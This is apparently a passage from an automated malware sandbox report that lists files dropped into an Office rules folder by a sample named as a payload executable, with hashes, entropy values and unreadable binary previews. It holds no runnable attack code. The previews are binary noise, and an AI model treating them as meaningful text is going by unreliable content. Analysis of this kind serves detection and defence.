                                                                                                      Preview:<?xml..%...r\...e..B9D.c.n.Z....liD.,..B0.<s{r.".j.6.fu...(..Eu......kcI.T..ky.{.=..2.2...........ltr!.Uv.@ol....*e.}.[.|...3=....S...RA..@~..-.M....^6.YC...B....s..../PM..<..Fq...]..hA...$..H..)...YMEM...9s..Q.....t..4.0u..d..c....a..iY.p...s'...8@...A.D|Y.b0.U....-u....{..8..........!.f.<z....-.A.`.*..v.}~^..+.%t..C..w.E[7N3..y.*...^..k.2...Jy.GR.1(h.rs..W.$..$^x...3.D.EF.g...Yau..k..;.^..b.V...8.>&.......L.W2..sx..f4A(....A.......B.5.piapM..e..s..Bl.1.t..^..)...J..BT{5w..._.m5..G3.&W.Z.`...&.-=...6..#....{z....W..=a.......d}.a.?Iy/..t...mt.....D]X...|..3..VN(.=.......Y.....>..p.~Nm.&.!M|..sF.*.1u)!..4#].. p...e{=%.<.9,.CdAzx.O$..{.._.S.}1./^...|!...0...N..ir..A.{......u.C|....K.....>.s.we-.1....IY..^A.`'hf;&?..p...O.J.......i;@v.. ..Olc.@..;.....7hp....a~..0..C>...[l..Z..:?....k,:.......(.e.].....{...N.0.f.F.y.Oo.QM..Bw.R.qp.S...=...Y......p..T..#0v....`;....M3..,].N~..@./...|'.6..~.5Jn.._6...EW..8X-*..>.1.,....Vl.`.;b?._).a.d.>

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68015v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1197
                                                                                                      Entropy (8bit):7.8282877313085875
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:etDGsOEnWsMN6fqZdIgImrQK/zShRMEVyqYV1mLscs/KQrpcRhNkSQB/C1v6bD:sdA6fAdIT3KmnVyJ1mHMKQSbQB/mwD
                                                                                                      MD5:E7BDE11469A4A7CB3C8ED5D9EBC8C515
                                                                                                      SHA1:38C3D95C37500278368EC6A1A42E3F84F522338F
                                                                                                      SHA-256:B596937E73DD65A3E4DD3A6F46E370B7B552B7264E481EE5D9546C7014F2A7FF
                                                                                                      SHA-512:11FF67017FFD080866F0CF0E02D2FAEBD32DAD8F1CBB1671C6EE46BB74C6C056A2E4EC618F82F52A1A25952845AB6DEB5B1E8AA384F9AA1AD42F6D409066D777
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..>F~.|wk.uR..l...4P6....Kc.D..9....k...U..ZX0...%.).TQJ.~0....@.|.?.>.t.z.B...T.A........Y2..j..&...,..R.?j.a.XPe._......a.W...].....M....5.~6.x2?D.#....df..6.-ep..?j.|C..c.rw..5.6...f.l>.\.2"s..W..+y..A.P..~4x.QCx.."\.)....L&K...N$..^.=.22...YT}..F....Z.COViW@V..,.).".'m2..V...C..1M.&*?...0..n$Y..2\Q.x...`..YD...i.{....#.'....}_x...\..-B.7......9..'p........%P..n.._}n./j.-4.....{..1...:....o..U.Oef.....o....P..|:.Ic.KR.;....]0V#.O.qzI.D.u........*r.[....zd1X.~..YM.M......5uE......c.H..6...M[H.>..yVk.....N._y.H.<.....[.....,.....G......Q...+3..b.........&gwQ....L..Ih...7.VspZ.?.V"..V..<.........U........0YB....PK*A.H]......pV............5.._v!h.}..a...0..D..~.fMPc%.(....a.[..^.s.=.j.ic....[=lka7...'IBh..6E.m..sRa...Q.f../..@n.:Y7...h.[2....X....p.Rv.........$..........)..9..e........r..".........;.D.4X.P..-..p.Q........s..P...`C.W)t...s1...u.>{..CC..}..0l...Cq..i3A..}er,<.7..<oh.......6|..\.}<..t.=. .|..L......P.r.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68016v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1004
                                                                                                      Entropy (8bit):7.813974703889958
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:OZA++G0AaXwSnS7XDPKkz/HYJJofojaxjH4IS22v6bD:CABG39tVz/tfCaxr4Q2wD
                                                                                                      MD5:D404E460DC49C2DA5CFCC4BFF1B589E1
                                                                                                      SHA1:BCECA56500A2952BD9368DD8919D36736C58C300
                                                                                                      SHA-256:5E46A1DA696DE1DD3448EC746E8D938C7C9239ED8305093E65B42818AC40DD32
                                                                                                      SHA-512:9ACCE920E5D9E06F6FB5D75C53B94B59E12CF036576AE3EB1DEE95D7766DF32E5813FD8A26AA05C970B634AD2F815EF29310F71AEA1A9D123EA3F177F1961243
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....I.-..Q..Jqq..)B.g...:E.M.....].]j?....e.{.\q.f.(.S....g..[..s..._.].........X.:.0M..YG!....1..:[.. f..T.G.[a.[I4./1..._,v....*&me.a.k`.~.....{...$Z'.d.r..A..j...k..l.. .._.........G.............+..;f...X..C=..........?.6..3.....'<1=}@..k...Fv....^.T.G.n............f..m.....gi.oH..~.`...g.E.../9x....p.|. ...G.........F=..T...].4...4.CM.-.D*mf.0...".6...(...q...iE......5)...s..u>....S.l.a..C.......Vf.bL...Z.E..l.......y..).1`6..]...w.I.y'.pd%.vi...'. X..D..o.##t...S......s...U..i.2=.........u...o...0.....4.7...`#...../V..f0.3q.5.......aN.... ....TuHY)3.K...\..V.a.w..4..!............3... ..6..\qH....`.....hv...B6...i3.....SmHWO..."..).......7....C.(..d..c..\...ap....H.e....,S..+.e.....Q.PI.4h(.,.=vO....x.P.XN]......+....F....S<.f..}.........e...K........]....?`..J.s...Jj.._..>=...H..$......3p....%St.x>_S.J..Dv..-......T"..l.$....F\.xg..!b.j..u.k......n1.H.8.B.Ow./..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68017v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1186
                                                                                                      Entropy (8bit):7.845580144869731
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:S0dlS9oDnPS0Whb/CJeIJ5yrxjtB3FTdCQ1zIxPpZr+Q6Pv6bD:S79Kn6J/ChGr1uPKRwD
                                                                                                      MD5:E258DBFBDD667F2621B628F058CE8E81
                                                                                                      SHA1:BA5EAF04656130F91AEE6CE3F2264EC953D84F1E
                                                                                                      SHA-256:5C887DFA30CA6EB6F80A26A71DABB82AE2777CABDF9EA0B478B8798E8031137B
                                                                                                      SHA-512:548E3421DABA309411AD5510E5CC037ECF8202BC4ECAD2608191EA0F0289310AEA3EAC04B4FF3F081C505595FED86DC7E070E1517B8297E12D9F4A1290A69A55
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..%r.[...".......I`...y.X=..T.`aX...FW..r.d...`...XZ...g.......KP.../.-..(./...;.d.}.^..... ..C.*.$.Z...>.....D..:..r..@d%G.M...GFvk0 _.u..P.&c......gCs.M6{wT...YE...q..sV.N.y..iW.B..R1.....x6.<.89.>0...y?...i..4h....W....G..O.uC53.B.`w.4..<...... .....qAp8.b...9&.c.e)...B..[m@.3.U...$.O..3....?..!....(9....%.I.o....`.......#.Q.".....l.k".<..s......../.o!...9.....++B...D.m.:$................-l~a<U{<.e...`..aM...DE........[..c.....^&.B..3_.s...S..jD.R[.FrR.:5.#..._.k..$..l._W..A3....0....r,u.n.1..1.....!...%K..%.,H..i.r..`.+=.u.2W..c.........._J.E.\.A.....ic...A..N.D..[r;},..(.2.EX.0=H...f..aV...s....5.c..e....9p...U|>.V................3.&d..y....6..#/.......S....<........."..........~tj.6.....Xb(W..8q.[.,...R..\..rX..d.._.2"z.fW.......I.....;.fa.m...Y;...o.9.Qe.'!.7G.+...f.t..o...!\m^.d.RM..>...s.qf..k.+....-s.9M.5.....5.l.V.............&.....~.z..!...@..o.@......S.M..hU..]..I#4V..;4o.bb..O.....F..\).K.0B"...........QX..0.h.N:....A.x

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68018v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1291
                                                                                                      Entropy (8bit):7.846792148102559
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:/B9B8XDl1aJKIe2BbZqNAcd5ExtgQfXJf2chIjGRnz2KAoZv1qv6bD:/XBgl1dIe2BbMfagQf5f5HRzwEv1qwD
                                                                                                      MD5:2B6FDE1199AF78B19304F0AA1BB8BA47
                                                                                                      SHA1:4767F7DBB202540292135C0B83E0668061DEE8FF
                                                                                                      SHA-256:CDCD1BDD40BC8D13B181C4BEC38895D777C971831DA5AD220406E1C7119AC540
                                                                                                      SHA-512:50AD906700E89CBC546E590E61CD35415966C93B28A753A8D035AA211C6BAB40D57652D5A8A240313AC80A9CB8BE498A919829145AA2E1EB7D39919E17340976
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml3.L.....K...?..../a....A...s.Z.M..43u.....K.6...dm......<%v.1;V..xp....=H......D0/..o....k.......O...q.....;....D.8.gRZ.P...{..@.......S.9.]..#%.U..wc....).%!...5..A.CC%H..w.-....<i...X..Mu..e.$s..m.m.(....)`0s../w.$"..MjA..8U.X>.".J...[.g.o.......PA..?.d6..:..q...R.~\..~.....tn.x..l...E.Dt.O.r.d.Vu..\.:.l.Z#.e..h.^..I!.c.`.....i........!..E!....T.P...41.....3.L..)-... .....?$..:9.6/ra..TV.....D..1.g'.L>z":..W.<v..dL................1.X'@'....&...I....&.Z..x.?~|..C#.v.y...Hz.{-$.m..@<J..B.a.~##!o....!.t.....P%...(G.q.......2.`.Fn......CB..Tg..t_.(.+I6.=.ate!......8...V...v0s..&.T........w....^....c=...m.7.........S.........{2.R~q/..B.Y}.%W....}~$.O...(..X..6.U.....Y.ax.<C....@Cd%.o$.{~..,.. .>.Iv.7h........*.G;..A. .,N....m..!>.....@.....;h.j..t.p..z..x..&$.@j^YZ...^'...zH..8...)....`I. ...%ba.....'..K...l#. ......R'..J.......W#.......b>.5.W.....xW.{......:.*$...Em\....t.Q...d..4.C6fKyzy.....^........5o...=.D...j.K@..0..]..x"&p.bW...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68019v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1737
                                                                                                      Entropy (8bit):7.895710165163038
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:MEBA8zIdLMrYGIXIfZ4HhKaHaUS0ucEct4uFno4Du0w8ZYXpRzkS6mn0poPb+O0t:HclIfGVAxuoZ0w+YjPj0poPalPp3iwD
                                                                                                      MD5:7F093AA3BD2C33C7CE9E54A61F6AF773
                                                                                                      SHA1:415B11BF83E4CABA7AA24EBCFEEAD9973FFC1B4E
                                                                                                      SHA-256:7D25A1A0FEE2894817198C3DF3526C3D0913FC73B7AF89AC280E24E3ADFD8E67
                                                                                                      SHA-512:A2AE785D650780B4282DFA2EEC08A747CFE3C717CEC7E3531448C2748D38D4DDD19FFB26AA8D40CF99285166378676CE9AAE5E44FA6F26F93164070EA1A18D3E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmli............/..c...\t.....G..../..8.nH..g..U<.'.....E.\<.....-...=.0D.h.x..o...p .4O.G;..y;DBp-.#......=...+.&..Y.<jq9.:...n......-0.I./...m.4..gc..L..]>K.k.....E.w.B5..X.6.....N6.7b)jV9Sd9_&.9.) .y.......A.|....K.N.."\.:.K.Y[.ci..{....3....:.B.K..........j.S..Y....o.4.nGl@...b...g..IO.......(K.(*.&~.+t.....,.mt^.....f..i?.sE]r.z..V..|'.`...I8vh...f*..1.....,.Vf......u#.FZ...`....C8.r..+.V....E.Cl...e..zv......3q29....".\`..V.R.e;.'......[[....xs.}..A..mZ3....%br).+f.....(gv.U..QV>.0....l....w....B..7.}..a.....}..&.z.....;.._..LI.T.Z(..9hU.l....C4mS$.Y....Y.......hpv..{.No.<W........*..A.=o.q.q..n.Q..x./.....>.9;.g.A......._..m..[.d]:.'...n......8.i...)..}.).^hc...Y....a(....|"h...N.E..L..y.,...[....&"..r.u../..nu.m..../.)...;.s.l}q...go..l.;O>\.........N...c.ij........./.Z..2.:...c....4bbL,O.l......l].y..|.#.F ...:."...,...5.^mk.v.^..J.p.....O{....v.S...gZ.S....J.....%..zAAwWS..G../>Z.:R.].{y. .6.f.c.q=..v...F....'....U...S...L....l

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68020v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1354
                                                                                                      Entropy (8bit):7.860389676462683
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:08uvsNZJAQ4vMzQRVlnvzuov2rEu+1MNd6abrsFa0CY1/siNc3B/npvaiv6bD:08rwD8MxvzT7MvbIg0CY6/nZfwD
                                                                                                      MD5:476D24CC714C04EA4A0BB3E443086EC3
                                                                                                      SHA1:5BCDB37A3F7DC74C692B642A060C689CFDD8657B
                                                                                                      SHA-256:1710AE29C0394DF2D71A800328F63AF84F7B1B61C7BA7B616663E79E7BC5BBBB
                                                                                                      SHA-512:5E3F270CEFEF68A2C95B29803705CF1D393CC1930F82F46C2EA2DD584254AD5DB82FD8D2FC9E940029EA7F68566CF58BC65F3C5319EB3D97BACD96F18E0D535D
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml{'.W.;..c.)......iW..L...vI.f}$`....T^.p:. .@.V7T..$...n......cs..^.X....m....vE.#..H..8...j....my.l^.?...#.B0b.u...$JN..[~23c....+N.O....kf...A>.Crr.q........O...{k#Z..m..:...r...YL=$.S.81.KY.m.x....$d9x..t..A0.....L(m;......W.....H..2J#._.....^...yF$;.tC..P.............P...OO........G......=....dz...|......d...e.|..Gf.#:....@/..F....sA...2;B..7....^ ...?..".1?0.I....8.e&kI.I...D../........Y..aC...OR...~...0.....V.G..4.<"......S/...<.......Xd.(...i....XE6*._..#......n....J..4...g....G8#.....\.F"...].a....mn.[.B.7M..!5b$.I.b....F|t....T...xL.L.W........x]j...s.x>..g....i....S.%By..U.YV...M@C.l.i.1...o.H.b.G....)`r..c,..F."..]].~*...%]t^.F..[.<........gw....d,.........z........+.W...=b..Y..../P.O'K..f.~G.'.0BO?i..9...k6.}.>.6.'=.;...s..K(..7|[#....Mu.N.n....9...2....<rB.a.>.!0......1..?P.*..P...)J0.%..X.#._._...U@.&..`p.c!.j..Q.Q.^/.9`...W. ?.Q...{..O._..!....4...%s.X.;...-WK.4...ne7....Y.hS...2@..\..hr..........&....+7../r..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68022v8.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1864
                                                                                                      Entropy (8bit):7.91005048001737
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:GRQc9IgI4zA56hx+sXdj138mBGkBk0E+iMYA1h0TgBOcavwD:Gmc9IgIzyx+EdZ3vwOk0nb1hbBOcr
                                                                                                      MD5:1F488F0F6EF731CED271300D5FDF0CAB
                                                                                                      SHA1:86CE15C146F9695FD9D958D6BDEFEA14ED661B74
                                                                                                      SHA-256:1BF74FBFE2426E60A6F029CB4BEA9CCE6747702DD7A97E8368274236372BA117
                                                                                                      SHA-512:1CEAC775CBFBBAD6B5D59C8780DFB2B5F93458F9E3AA0305577B379CCCAD265569A46FE92963E9AAAA02FEB309436804CAFB9DE117EA2854D5ED283D0A812952
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlU.._.s..p-...W...6...#.^Kc\..D.B.$./....{....2.....+u.t....G.w..S..?.V.....x.8.L..r>.p.3.....Q.......~..j...K..W.5%k......2..) .._...J.{.;.|..o.;.....UF.TU}G...P........S...+.$#...`.p....L..B:*.w.t...%8.*..!Q...ta.............c."vH......<../..d.>..7aN.~v.{c...#.D._K..)O..8U .$.&...8.[u.;.C.E........3s...u...."...V#..]..i.XJk...V...B......!"v.G...U\...$.<.,..........^:.+.-XeK>..B.......u........xQ..?e...7k........hl?.|.^Wb..j..9.s....$.`oz..Z.i.S..t.Y...=.i..fG...d.......B?...2...r.v;.v.H.s+....)bsI.B.>%...tL....u.23.U.; Q..K...`X..$T.) !A.:....M^.OX.gds.....5....N.7...D...........3.........T.q..C.vL.V.:}y.M...4P.I .....;..2.K(...uqrm. $.]........x<.......C.#...:.../...1....9...[.].c&B.+Q..v.x...mj;.!WeAW!..8F..p$.oR2,.S:...p^'}."...v.swL.{..+......5.....>%+I.....[.29*1......m...U.^..Uo.Y.3e.{F.....y;.).5<%...R7O..w.z.EW.....[. ..p......M*.V.0.wv-...IL....qT.|.l.1.../.%~.{F..;..P..L.H..........jd.......i<.*..f@T.m....DF.e..K.1.:h

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68023v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1509
                                                                                                      Entropy (8bit):7.8590021391136275
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:G/Be5R9tzsQHgRSbZfo4AV+K9GiUv78JDx6WPfN4BwbxpFUdX7fcfyiAFGKUiv6X:G/Be7gJ+dXAV+K9G3v7EDHdUwbxpFScR
                                                                                                      MD5:56DBDDC3A8AF264CDB28A10CD4F0EA7A
                                                                                                      SHA1:A255BB85A8EB7C0BA648A897B9F7F091C339AC77
                                                                                                      SHA-256:336E17B776A52A0E5EFEB193C1F41B718B3768010F5EE0BBCB8D0F426B699F93
                                                                                                      SHA-512:A55F8C8EF4241F871D5E91BF99C7507031F5A4E85DD71BAF9344C92CEC264D23F29A602673E6E265A62D515766BF6A27A663781CFC82A94BD88E4BA6DDC1A4EC
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.8.M.....;.....`.Ot0.W..Qr..t.0..j4XT..)2T.1......0..(.gE.....p|"...A...)&...GVo"....S..j.5:.Q.:...D..|..^...,..8.V.]l.....>b.p.(..u..+.{.~.:....../...-........E.+...jM...Zb....3...X..).x)f.}.!.,.."c.".O.Qu_..l.P......!%cz..M.....7:.Y..4.Y.tnWN.%:...BQ/..L..%&.<5.[18...d..1..6O..L.|^h...1!.D...O...u.....#..`.x.$.;9....^=.].J!p....,.G...CQ.`..L22.._...G.{>-.p.P..+..g..W....$......,.T.`...$s..&......o...6....T...I...B-1..r.....1...O...b..[.eC.!..t.Z.....$...@...Sn|LO.v....!b.....8....J..b............2.&.M...J.c{.......o.......k.EFCU.(....]...n..e5.I..-..fQ.Y ..@.2PR.]{....>-1A.n.V.u_..fT.p....]k..$@`k:.9rlT.V4..@Qf.(.*...K..i....bz...a<Ys...]&$pR..B_b.../B/....=..K.b...Vz.5......C..DyG...H..[R.....^.7..i1..%.Y.Fe.$S..r.K;....?..A..kFcf..$....[.g.P.Oe.HcI..4T..."..6I...9.?^..Iu...f...H&6..1Pk..N.t.[8p....Q...|......`..X.g.L7T......]...)..+.M..hm...)..-O.....`/.L......}..z6..2.EUUt9ZI<.I./.H.r........cL.....h|...]|..27.9.@/.K..<...v#..e

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68024v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2007
                                                                                                      Entropy (8bit):7.893649398171902
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:1UN+E11dN5wRu6Yc9u+t8AvgqJ8MoW3n3iwD:YRmAJczRvrYu
                                                                                                      MD5:90C2C565C14489B305D3A236CC08B463
                                                                                                      SHA1:4E33FBF0496ED7EC9493871D633C12655D7BD001
                                                                                                      SHA-256:2F5F4073577DBD866C20D0C31C876059876F906FF5F6073D95C4276E1C409C10
                                                                                                      SHA-512:BF3D84D3279E2A47422A7DC864435FB8C8749EA5588A96D0B45F73B25BC0C786E222653493F993ED1709D933B7A894304F1AA3E6750E532779AD032A05F3F11E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml|6..X?Kh....d....P@,wN.i.?..l..k_|...8...u_US.W....T'..U(....G.........,.IO..*.wO.1...Y./..H=....c./Z...,|...f.\.x.b.|.FB..H.w&....&V....r....&....%...y>3n...."8...'4qk;.({.&.\.\..9a.-..Q.u.&.."...A....{,.4.m4....0z.,~(...|C'./e..A..1.-nV.........C....t2c..D3*...7.......`..]...[.{.M..y...e..6.S+>x*.G..(...Kp8....1...S...:.).uh...x.Er..{....iG.BK{..q..=..]|..Y;..W..FI.#..=j..8.(qB.....A.].z.P.u.K.......b.[H`...N.......l.]fEv.Q....M.]...$...6k\y.[....Sg..D......p...@..In..xNL>B..q.T.....%....D.6@g.R...M.....W..m+TB.Y6..Q..g.K...[...a.z.<....EX.f`....n/... .wlj.`.......=.n....&.....e..F&......].@.j.=.i>..pt.\.....?.o...Ugd.....@~/%f..u.'...-.SH........c.......h .d.UI..&......."$...8.../...A..#.&}PV....QWI._.........R.........+..N..T...y....c.D.M..B.qr...$..}h...f...=..(,W...V..!C.......;>.x.K.%..W.....+..Bj.~}/.v.........-..ZD.!.5..a...\.:_c...~`...JwY..)0..~@...C3.X.|.T..............x^.?.....j|..J..=...a.....gd.M.'......E..e..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68025v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1276
                                                                                                      Entropy (8bit):7.828650503741877
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:O9n6uWu8RMj4vkB9HeByAvby1vuZuhLE58q+9J/MngUKya8h60QDx/V00v6bD:Spj46VeByNGyLY8/VQgGe9+0wD
                                                                                                      MD5:3060CBCA4E92A03433DAAAB8831BB5EF
                                                                                                      SHA1:9F89790AB4F306674F62F603A1F3D0DFF3952D0D
                                                                                                      SHA-256:50FA556377B5129A9C7A36596A19C40EB2709A1222CF8968EED2309A1162471B
                                                                                                      SHA-512:C2416B1D1DC18DFE6A225C5D9BE211717173807149DC34B074D70E4E70DFE275958529F9EB638941CC908A76F9979568939E291026A67252F8AC435F8C5CF3CC
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.c..).8..$.F.8h...Hh.(E,dR.2.H.d.hAI:.CN..k^L.i..h...>q.=......)......=(....nr.N..;S.G<{.{&Pi..&Y.....Ffv.@XD....4.5.....svY.a.e.p......I.E7.JY.|wo..0.#C.....g.r.$.l......J. T:..2[Sv*`I...&.2..tW.&.m..sj..$..q..s_..=...G..5A....g..[..H.pv!.j.;..Pc....b...&.F.$.<.$.....'./..=...!7..v{G....a.....Y>..(...'..'.$.GE....3.....br....%>6.....].-By.k\i....a.L..+j;....)$...p........nL....^.0.8......Mz..=.....$.lL.2.....y..a3...c.-..h{C.....wn..<n9Bu....+.74H...&......fh V..m,>..n.....In0%HZ.V..:|..PYI.zUWjtCH-....l..T~.P3X..0..h...\....9Xi3.$.k......v~...sn....(z~..%K..)......m^.z^..#$.d/......P..HnG.2.MJA.H.).</w;.1..."@..*...I~..|NMy_.-......%.!.p.....9....(M.v..ZF<_.V...\..k......]........}..."*...........W.....}._=..&|..'.@D)O.j.)...]H6.T.4........22.".Pe..0)..........r.%,..#.....2!xg2..TgQ.....Y..1P..|^..)OaL...-...D.L.CM@;..Sp...W.S;K-...}..;.....yH'B..h.?.F...2s.E..l.m...!.k..K..*..1..&mA2.....>..jZF..c........JV.[..a..9}......j[.oH#.[&.W.J.@@.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68026v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2037
                                                                                                      Entropy (8bit):7.899080182674202
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:1j8mnWpdsQDnzRpKxAuHLfnZBlnMGMbTgkp6WJybwD:1j8t+KTW7Hpj+dj
                                                                                                      MD5:6AD1027179011796027F4F31D78DD2EA
                                                                                                      SHA1:CE7D1D226E40582A5F889DFA3EA31BC801C6CFAC
                                                                                                      SHA-256:45DFB42C6DE6BCC7F95BF76D08512A4492DD60D404C5B356F87FFB338736ED41
                                                                                                      SHA-512:5CCE1DF41724DA8BBC244E2EC78FA2D3CCD4DA123EE9588FC060CAA1F74CDE9A43061E1C710525A5DEB11C6AFF0716D361290AC05BD3E1EFDC016105CE5F6BD9
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlwa9.'.o...IG...R..."z.....)9..&.t\&.e...e..C.q..v.{1..).d5..)p./.....L.../..:N.h.[9J.T....9..s..Y.e.C;..c...'.jd.E.../...n...;*.,....&.tm.X...<.I...r.SF.R.^..51...1..;./.g...w.o.Q...&+.7=...r:.5.8.]...M......4......}1..g.....:.........B..6.y..8..Y(0..|......^..e;....>N......#.~....o........8.........u..8...-.0..1..w...s...B...EK[.M,.m..f..X.^...9...~t...............t.S.......+.3PV..&..:...?.N:X9^>......:P.-.4\...su...O...2..Ai.r.0...6y.o..t..3.8.b........\...V`...C...*n..%.A.7..|.??\.........f...'....1t.............<....]4.5#.X...L........Y.G"..5.n@r...W.@.:*U.l{.....X.},5..+M.....9./.@F...8..G|j .Gd.;f.<....Bg.`.L....E.........t..e7.-.1..G...k.n..~.E.....u....ax$7...}:....+.2k]..3A.../9C...<.j.... .........X.U.}....;.....s..d.O...c..'.~.......TsR.f.uEU6.+"vC{...b.R.9..Mr....$9M.Q......<........g..6..sj*......F..U.c.c...)...m..pl....d.%Z`.....r]..........#&......J^),E'.....&...:0Zb...T.-W.&...P.l..H.......9R.Wx...#~......._.5...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68027v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1180
                                                                                                      Entropy (8bit):7.8352791471958545
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:3iJZz7RcS3MLIK51Y0mZZSHwaA2QaA82nHaKZWx0Gov6bD:3iJ1l9MLIK5Xm2HwaArah2nHx0kwD
                                                                                                      MD5:0A1DEDD140F904464CCF70844E8E8D86
                                                                                                      SHA1:F42EF50A01B12B5BB444FFF90009167C5B5D8E37
                                                                                                      SHA-256:D5993A0DDDF510BD44D5FE50EA55BAFD6A6372F4BD619E5305865EF510EFDB1B
                                                                                                      SHA-512:E7C75E515E0BC3C62C787B7B91F31656601668686DBC66CB7C22DD075249A43BEEDFD1B94961CDEDF4A5CB6567733E7402EE06D7382112D0CCF04112EBA8C78E
                                                                                                      Malicious:false
